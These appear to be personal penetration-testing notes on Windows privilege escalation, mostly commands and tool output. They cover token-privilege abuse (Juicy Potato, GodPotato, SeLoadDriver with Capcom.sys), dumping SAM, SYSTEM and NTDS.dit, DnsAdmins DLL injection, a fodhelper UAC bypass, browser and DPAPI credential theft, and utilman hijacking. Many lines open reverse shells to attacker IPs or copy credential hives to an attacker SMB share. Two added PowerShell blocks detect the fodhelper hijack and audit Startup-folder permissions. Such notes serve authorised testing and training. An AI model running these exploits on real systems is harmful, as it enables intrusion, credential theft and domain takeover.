.\Juicy.Potato.x86.exe -l 1360 -p c:\windows\system32\cmd.exe -a "/c c:\users\Public\nc.exe -e cmd.exe 192.168.45.154 242" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
Automate the process of finding a valid CLSID that runs as NT AUTHORITY\SYSTEM
create a file named test_clsid.bat
@echo off
:: Starting port, you can change it
set /a port=10000
SETLOCAL ENABLEDELAYEDEXPANSION
FOR /F %%i IN (CLSID.list) DO (
echo %%i !port!
juicypotato.exe -z -l !port! -c %%i >> result.log
set RET=!ERRORLEVEL!
:: echo !RET!
if "!RET!" == "1" set /a port=port+1
)
create a file named CLSID.list
fill it with the CLSID list from "https://github.com/ohpe/juicy-potato/tree/master/CLSID"
run the bat file
and then use a CLSID that runs as NT AUTHORITY\SYSTEM

SeBackupPrivilege
1-RegSave.exe
.\RegSave.exe -t DC01 -o "C:\Users\svc_backup\Documents" --backup
[+] Exported \\DC01\HKLM\SAM to C:\Users\svc_backup\Documents\3BEF2064-A1DA-422E-B5D8-0086D1FB82E4
[+] Exported \\DC01\HKLM\SYSTEM to C:\Users\svc_backup\Documents\B8519DCB-2E82-4D28-AAD4-CF5428193033
[+] Exported \\DC01\HKLM\SECURITY to C:\Users\svc_backup\Documents\D4818E3E-7A32-4876-B9B7-1B9236317F27
2-SAM via registry
reg save hklm\system system
reg save hklm\sam sam
3-NTDSUtil
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
impacket-secretsdump -ntds /root/ntds.dit -system /root/SYSTEM LOCAL
4-diskshadow
create a script and convert it to DOS line endings
$ cat kunal.dsh
set context persistent nowriters
add volume c: alias kunal
create
expose %kunal% z:
#convert
$ unix2dos kunal.dsh
unix2dos: converting file kunal.dsh to DOS format...
#or we can write it as ASCII directly from PowerShell
Get-Content -path kunal.dsh | set-content -path kunal.script -encoding ascii
diskshadow /s kunal.dsh
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: BABYDC, 10/23/2023 3:11:30 PM
-> set context persistent nowriters
-> add volume c: alias kunal
-> create
Alias kunal for shadow ID {69873b2c-c8cc-47c4-87f6-530b086b0eed} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {825b3882-58fd-45ec-82b4-d41c20790e90} set as environment variable.
Querying all shadow copies with the shadow copy set ID {825b3882-58fd-45ec-82b4-d41c20790e90}
* Shadow copy ID = {69873b2c-c8cc-47c4-87f6-530b086b0eed} %kunal%
- Shadow copy set: {825b3882-58fd-45ec-82b4-d41c20790e90} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{1b77e212-0000-0000-0000-100000000000}\ [C:\]
- Creation time: 10/23/2023 3:11:30 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: BabyDC.baby.vl
- Service machine: BabyDC.baby.vl
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %kunal% z:
-> %kunal% = {69873b2c-c8cc-47c4-87f6-530b086b0eed}
The shadow copy was successfully exposed as z:\.
use robocopy to copy ntds.dit
robocopy /B Z:\Windows\NTDS . ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Monday, October 23, 2023 3:16:12 PM
Source : Z:\Windows\NTDS\
Dest : C:\Temp\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 Z:\Windows\NTDS\
New File 16.0 m ntds.dit
...
------------------------------------------------------------------------------
Total Copied Skipped Mismatch FAILED Extras
Dirs : 1 0 1 0 0 0
Files : 1 1 0 0 0 0
Bytes : 16.00 m 16.00 m 0 0 0 0
Times : 0:00:00 0:00:00 0:00:00 0:00:00
Speed : 111,107,390 Bytes/sec.
Speed : 6,357.616 MegaBytes/min.
Ended : Monday, October 23, 2023 3:16:12 PM
ntds.dit was created in the temp directory
PS C:\Temp> dir ntds.dit
Directory: C:\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/23/2023 10:52 AM 16777216 ntds.dit
5-Wbadmin
first you need to set up an SMB server that supports NTFS
1-configure a Samba server with authentication
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
interfaces = tun0
smb ports = 445
[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
force user = smbuser
2-Create a new user matching the one in the force user parameter
adduser smbuser
smbpasswd -a smbuser
3-test the connection from the Windows machine
net use k: \\10.10.14.3\smb /user:smbuser smbpass
4-back up NTDS
echo "Y" | wbadmin start backup -backuptarget:\\10.10.16.3\smb -include:c:\windows\ntds
5-Next, retrieve the version of the backup.
wbadmin get versions
6-We can now restore the NTDS.dit file, specifying the backup version.
echo "Y" | wbadmin start recovery -version:10/01/2020-14:23 -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl

7-We need to export the system hive too, and transfer both this and the NTDS.dit to our local machine.
reg save HKLM\SYSTEM C:\system.hive
8-copy the files to our Kali machine
cp ntds.dit \\10.10.14.3\smb\NTDS.dit
cp system.hive \\10.10.14.3\smb\system.hive
9-dump NTDS.dit
secretsdump.py -ntds NTDS.dit -system system.hive LOCAL -history
SeRestorePrivilege
SeRestoreAbuse.exe
getting a shell as LocalSystem
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR tun0 IP> LPORT=80 -f exe -o reverse.exe
.\SeRestoreAbuse.exe C:\reverse.exe
Hijacking utilman.exe
By replacing utilman.exe with cmd.exe, we can access the Command Prompt from the Windows login screen without needing to log in. This means that if we reboot or log out of the machine and press Windows Key + U at the login screen, instead of opening the Utility Manager the system launches a Command Prompt with SYSTEM privileges.

Now, opening RDP with rdesktop, we can call utilman.exe using Windows + U
SeLoadDriverPrivilege
Upload eoploaddriver_x64.exe, Capcom.sys and ExploitCapcom.exe to a writable directory on the target machine.
First we need to enable SeLoadDriverPrivilege, which is disabled.
.\eoploaddriver_x64.exe System\\CurrentControlSet\\dfserv C:\\Temp\\Capcom.sys
Now load Capcom.sys on the target machine using ExploitCapcom.exe.
.\ExploitCapcom.exe LOAD C:\\Temp\\Capcom.sys
After Capcom.sys is loaded we can run any command as a privileged user with the EXPLOIT keyword.
.\ExploitCapcom.exe EXPLOIT whoami
Now we generate a reverse shell with msfvenom on the attacker VM (any other reverse shell works too).
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.x.x LPORT=4444 -f exe > shell.exe
Upload it to the target machine and execute the payload.
.\ExploitCapcom.exe EXPLOIT shell.exe
You get a reverse shell as SYSTEM.
SeManageVolumePrivilege
exploit link: you just need to run it and you will be able to write to C:\Windows\System32
.\SeManageVolumeExploit.exe
#confirm we can write to C:\Windows\System32
echo "test" > C:\Windows\System32\test.txt
#so we can hijack anything we want
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.154 LPORT=135 -f dll -o tzres.dll
copy tzres.dll C:\Windows\System32\wbem
systeminfo
SeTakeOwnershipPrivilege
enable it
PS C:\htb> Import-Module .\Enable-Privilege.ps1
PS C:\htb> .\EnableAllTokenPrivs.ps1
PS C:\htb> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ======================================== =======
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Let's check out our target file to gather a bit more information about it.
Get-ChildItem -Path 'C:\Department Shares\Private\IT\cred.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}
FullName LastWriteTime Attributes Owner
-------- ------------- ----------
C:\Department Shares\Private\IT\cred.txt 6/18/2021 PM Archive
Now we can use the takeown Windows binary to change ownership of the file.
PS C:\htb> takeown /f 'C:\Department Shares\Private\IT\cred.txt'
SUCCESS: The file (or folder): "C:\Department Shares\Private\IT\cred.txt" now owned by user "WINLPE-SRV01\htb-student".
We can confirm ownership using the same command as before. We now see that our user account is the file owner.
PS C:\htb> Get-ChildItem -Path 'C:\Department Shares\Private\IT\cred.txt' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}
Name Directory Owner
---- --------- -----
cred.txt C:\Department Shares\Private\IT WINLPE-SRV01\htb-student
Let's grant our user full privileges over the target file.
PS C:\htb> icacls 'C:\Department Shares\Private\IT\cred.txt' /grant htb-student:F
processed file: C:\Department Shares\Private\IT\cred.txt
Successfully processed 1 files; Failed processing 0 files
some interesting files we can take ownership of
c:\inetpub\wwwroot\web.config
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
Groups Privileges
DnsAdmins
#generate a DLL with msfvenom
msfvenom -p windows/x64/exec cmd='net user administrator P@s5w0rd123! /domain' -f dll > da.dll
#start an SMB server remotely to avoid triggering AV
sudo impacket-smbserver share ./
# dnscmd utility can be used to set the remote DLL path into the Windows Registry
cmd /c dnscmd localhost /config /serverlevelplugindll \\10.10.14.9\share\da.dll
#restart the DNS service
sc.exe stop dns
sc.exe start dns
#log in as administrator
sudo psexec.py megabank.local/[email protected]
Local Service or Network Service Group
Checking if we have local service privileges
C:\xampp\htdocs>whoami
nt authority\local service
using FullPowers.exe
#download file
iwr http://10.8.0.210/FullPowers.exe -outfile FullPowers.exe
#usage 1: spawn a new cmd as LocalSystem
.\FullPowers.exe
[+] Successfully created scheduled task. PID=9976
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>
#usage 2
./FullPowers.exe -c "C:\temp\nc64.exe 10.8.0.210 443 -e cmd" -z
[+] Started dummy thread with id 3704
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
Now we can abuse SeImpersonatePrivilege
using GodPotato
https://github.com/BeichenDream/GodPotato/releases. First start a netcat listener, then run the following command
.\godpotato.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.0.210 443"
[*] CombaseModule: 0x140719151316992
[*] DispatchTable: 0x140719153908040
[*] UseProtseqFunction: 0x140719153202512
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\1b0ba6f7-8e06-410f-8a43-28aa0ef32cba\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00005402-13a4-ffff-3ceb-87cca0c5c52b
[*] DCOM obj OXID: 0xd3f11f2e3a039eb6
[*] DCOM obj OID: 0xe1ff42788f3c2c30
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 896 Token:0x736 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 4184
Server Operators
It is a very highly privileged group that can log in locally to servers, including Domain Controllers. Membership of this group confers the powerful SeBackupPrivilege and SeRestorePrivilege privileges and the ability to control local services.
sc.exe config browser binpath="C:\Windows\System32\cmd.exe /c net user Administrator Password1"
[SC] ChangeServiceConfig SUCCESS
sc.exe qc browser
sc.exe stop browser
sc.exe start browser
All dumping techniques
1-dumping SAM/SYSTEM/SECURITY from the registry
reg save hklm\sam C:\sam
reg save hklm\SYSTEM C:\system
2-dumping sam and system locally
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
3-Memory for a process
procdump.exe -accepteula -ma <proc_name_tasklist>
Monitoring a process every 30s
Get-Process backup -ErrorAction SilentlyContinue | Watch-Command -Difference -Continuous -Seconds 30
Kernel Exploits
systeminfo > sysinfo.txt
# check the most recent installed KB and search whether any exploits exist for what it leaves unpatched
wmic qfe list
using Windows-Exploit-Suggester (AonCyberLabs fork)
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
pip2 install xlrd==1.2.0
python2.7 windows-exploit-suggester.py --update
python2.7 windows-exploit-suggester.py --database ./2024-08-05-mssb.xls --systeminfo sysinfo.txt
using wesng
git clone https://github.com/bitsadmin/wesng --depth 1
#i used this one
python /opt/wesng/wes.py ./systeminfo.txt -i 'Elevation of Privilege' --exploits-only
using Windows-Exploit-Suggester with an already downloaded database
windows-exploit-suggester.py --database /home/kali/Desktop/oscp/Lab-Challengs/challenge_4/OSCP_A/Hermes/exploit/Windows-Exploit-Suggester/2024-08-05-mssb.xls --systeminfo
Browser Credentials
SharpChrome
PS C:\htb> .\SharpChrome.exe logins /unprotect
__ _
(_ |_ _. ._ ._ / |_ ._ _ ._ _ _
__) | | (_| | |_) \_ | | | (_) | | | (/_
|
v1.7.0
[*] Action: Chrome Saved Logins Triage
[*] Triaging Chrome Logins for current user
[*] AES state key file : C:\Users\bob\AppData\Local\Google\Chrome\User Data\Local State
[*] AES state key : 5A2BF178278C85E70F63C4CC6593C24D61C9E2D38683146F6201B32D5B767CA0
--- Chrome Credential (Path: C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data) ---
file_path,signon_realm,origin_url,date_created,times_used,username,password
C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://vc01.inlanefreight.local/,https://vc01.inlanefreight.local/ui,4/12/2021 5:16:52 PM,13262735812597100,[email protected],Welcome**
Bypassing Restrictions
bypass UAC
1-UACMe
akagi64.exe [method] (optional: exe to be run; defaults to cmd.exe)
akagi64.exe 61 "c:\windows\system32\charmap.exe"
2-fodhelper
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "C:\Users\admin\Desktop\nc.exe 10.8.0.136 2222 -e powershell.exe" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
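A defender-side check for the handler hijack above, added here as an example and not part of the original notes: it reports whether the ms-settings command key exists in the current user's hive, what it points to, and can remove it. The function name and the -Remove switch are my own.

```powershell
# Added example (not from the original notes): detect and optionally clean up
# the HKCU ms-settings handler that the fodhelper bypass above plants.
# Runs in the context of the user whose hive is being inspected.
$HijackKey = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command'

function Test-FodhelperHijack {
    param([switch]$Remove)   # hypothetical switch added for cleanup

    if (-not (Test-Path -Path $HijackKey)) {
        return [pscustomobject]@{ Present = $false; Command = $null; DelegateExecute = $false }
    }

    $props = Get-ItemProperty -Path $HijackKey
    # Both artifacts together are the classic fodhelper pattern: an empty
    # DelegateExecute value plus a (default) command that runs elevated.
    $result = [pscustomobject]@{
        Present         = $true
        Command         = $props.'(default)'
        DelegateExecute = $null -ne $props.PSObject.Properties['DelegateExecute']
    }

    if ($Remove) {
        # A clean profile has no ms-settings class at all, so drop the whole branch.
        Remove-Item -Path 'HKCU:\Software\Classes\ms-settings' -Recurse -Force
        $result | Add-Member -NotePropertyName Removed -NotePropertyValue $true
    }
    return $result
}

Test-FodhelperHijack | Format-List
# Sysmon event ID 13 (RegistryEvent, value set) on this key path catches the
# planting step on hosts where Sysmon is deployed.
```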
bypass the PowerShell execution policy
Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser
Get-ExecutionPolicy -Scope CurrentUser
Dump a process to look for passwords
# looking for Firefox
Get-Process firefox
./procdump64.exe -accepteula -ma <firefox_pid>
Select-String -Path .\*.dmp -Pattern 'password' > 1.txt
type 1.txt | findstr /s /i "admin"
TightVNC
The registry file found contains a Password attribute whose value consists of hexadecimal bytes.
# suppose this is the password we found
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
# we now need to decrypt it using metasploit's irb; the key below is the fixed DES key every VNC server uses
msfconsole
msf5 > irb
key="\x17\x52\x6b\x06\x23\x4e\x58\x07"
require 'rex/proto/rfb'
Rex::Proto::RFB::Cipher.decrypt ["6BCF2A4B6E5ACA0F"].pack('H*'), key
Decrypting PowerShell Credentials
If we have gained command execution in the context of this user or can abuse DPAPI, then we can recover the cleartext credentials from encrypted.xml. The example below assumes the former.
Method 1
PS C:\htb> $credential = Import-Clixml -Path 'C:\scripts\pass.xml'
PS C:\htb> $credential.GetNetworkCredential().username
bob
PS C:\htb> $credential.GetNetworkCredential().password
Str0ng3ncryptedP@ss!
Method 2 (the exported string only decrypts under the same user account and machine that produced it, because ConvertTo-SecureString without -Key relies on DPAPI)
$user = "Administrator"
$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367" | ConvertTo-SecureString
$cred = New-Object System.Management.Automation.PSCredential($user, $pass)
$cred.GetNetworkCredential() | Format-List
Symbolic link (junction) abuse
# usage: mklink /J <link directory, must not already exist> <target directory>
cmd /c "mklink /J C:\Users\upload C:\xampp\htdocs"
Spawn a shell as Administrator
Invoke-RunasCs -Username Administrator -Password trustno1 -Command ./shell.exe
# PsExec (-s runs as SYSTEM, -i on the interactive desktop)
.\PsExec64.exe -accepteula -i -s "c:\shell.exe"
# winexe from Linux
winexe -U 'admin%Password123' //192.168.45.16 cmd.exe
# spawn a shell as SYSTEM
winexe -U 'admin%Password123' --system //192.168.45.16 cmd.exe
Insecure GUI Apps
check which user a running GUI process belongs to
tasklist /V | findstr mspaint.exe
abuse the app's GUI by opening cmd from it (it inherits the app's privileges)
[screenshot: open cmd here]
Startup Apps
Each user can define apps that start when they log in by placing shortcuts in a specific directory. Windows also has a startup directory for apps that should start for all users:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
If we can create a file in this directory, we can drop a shortcut to our reverse shell executable and escalate privileges when an admin logs in.
using accesschk
to check permissions over this directory
accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
create a shortcut
powershell "$s=(New-Object -COMObject WScript.Shell).CreateShortcut('c:\test\test.lnk'); $s.TargetPath='c:\users\test\desktop\test.exe'; $s.Save()"
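An audit of the all-users Startup folder from the defender's side, added here as an example that is not part of the original notes: it flags ACL entries that let low-privilege principals create files there (the condition the shortcut trick above needs) and resolves what every existing shortcut points at. The function names are my own; the folder path is the one quoted above.

```powershell
# Added example (not from the original notes): audit the all-users Startup
# folder for write access by low-privilege principals and resolve the target
# of every shortcut already placed there.
$StartupDir = "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

# Principals that should never be allowed to create files in this folder.
$LowPrivPrincipals = @('Everyone', 'BUILTIN\Users',
                       'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

function Get-StartupWriteRisk {
    $createFiles  = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles
    $genericWrite = 0x40000000   # GENERIC_WRITE, appears as a raw number in some ACEs
    $genericAll   = 0x10000000   # GENERIC_ALL

    foreach ($ace in (Get-Acl -Path $StartupDir).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        $rights  = [int]$ace.FileSystemRights
        $canDrop = ($rights -band ($createFiles -bor $genericWrite -bor $genericAll)) -ne 0
        if ($canDrop) {
            [pscustomobject]@{
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

function Get-StartupShortcutTargets {
    $shell = New-Object -ComObject WScript.Shell
    Get-ChildItem -Path $StartupDir -Filter '*.lnk' -ErrorAction SilentlyContinue | ForEach-Object {
        $lnk = $shell.CreateShortcut($_.FullName)
        [pscustomobject]@{
            Shortcut  = $_.Name
            Target    = $lnk.TargetPath
            Arguments = $lnk.Arguments
            Modified  = $_.LastWriteTime
        }
    }
}

$risk = @(Get-StartupWriteRisk)
if ($risk.Count -eq 0) { 'No low-privilege write access to the Startup folder.' }
else { $risk | Format-Table -AutoSize }
Get-StartupShortcutTargets | Format-Table -AutoSize
```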
Installed Software Exploits
tasklist /V
# use Seatbelt to find non-standard processes
.\Seatbelt.exe NonstandardProcesses
# using winPEAS
winPEAS.exe quiet processinfo